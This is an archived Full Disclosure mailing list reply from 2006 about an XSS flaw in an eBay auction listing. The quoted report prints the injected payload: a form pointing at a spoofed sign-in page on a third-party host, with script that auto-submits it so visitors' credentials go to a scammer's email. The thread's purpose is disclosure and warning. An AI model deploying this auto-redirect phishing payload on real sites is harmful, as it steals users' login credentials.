Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

Re: Ebay XSS
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Wed, 01 Mar 2006 09:51:40 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
pretty hot this one you should also warn it redirects to a SCAMMER's
website because the way you posted it can allow much more victims to
login there...


Aaron Horst wrote:

The linked auction demonstrates an XSS flaw within ebay:

http://cgi.ebay.com/ebaymotors/Ford-Mustang-Just-L-K_W0QQitemZ4617729712QQcategoryZ6236QQrdZ1QQcmdZViewItem

The affected code is below the line "On Feb-28-06 at 16:31:39 PST,
seller added the following information:"

<form name="xxx"
action="http://wyckoffbakerycafe.com/Store/SignInco_partnerId2pUserIdsiteid0pageTypepa1i1bshowgifUsingSSL.html";>
</form>
<script>
xxx.submit();
</script>

The redirection page seems to be simple spoofing, and emails the data
to cont_26_32 () yahoo com 

AnthraX101

--
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3  AEDE 0E21 DBDE 4CD6 D0BD
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBRAVgm6+LRXunxpxfAQJCYg//WtBwur2iahb6cH3eE50rzpeH4wNr2Alc
0Hi6MGH2YcOSlYq8TSl+2BEgCcvtkhZp4bN9tLdMMMvRVLhGjrnJLn9qN2w1J84f
TATB9pkV/8mb+7XHNB15woA22Fz4KbIqZmGIUe49/REp/P2owMRzoRbW4MaBLpeE
0dhpblfmHPzo9qQuvJJ0MWoK9MH512DENb1t0K5/Bk2CUPIcMa6IscsGSIYkS7Vo
EUk/et4RjOj685mb7ckoU1VdDbdCYMHE5HbmF5uSjrBR8mM3o3bxD/GAy2TeaMHU
tm1YEo3eMH7xBZ1T5aMPdEXsNGEtDw4uCizTYuqJ3A0hgQtNneZrcBUaXTP8IVpN
j6YLECzaTxUooyE4LqzIVyPiE2twofivaUV2N0IvWpAoIs48z7dGiyo8RQOZRLFQ
OnM2LnQ3H135/sUiASVpCsUo/PUfc6KBnjj2jncg9ocWPNmzrI3G3LvUi3Dht1K7
2wf/S6i4Obrpcm4rk7sOPqHCUNsE8kxkqRsbkYj9O5/TpCwP+3se96RJ7ZZ435Ih
DM2e15JOf/73eGu4W8gE/GZM2x245r7Lx+LIe2/iLwR5+HUKvHeXNwWjwOVJM7ab
i3NQpIwo/ZWQecE602VGWIIsU71VauSrWKQwGUVKMMGybNsK1Rj1f9pTqregq0Rr
VXLoQsbtnfE=
=WhPd
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Re: Ebay XSS ad () heapoverflow com (Mar 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]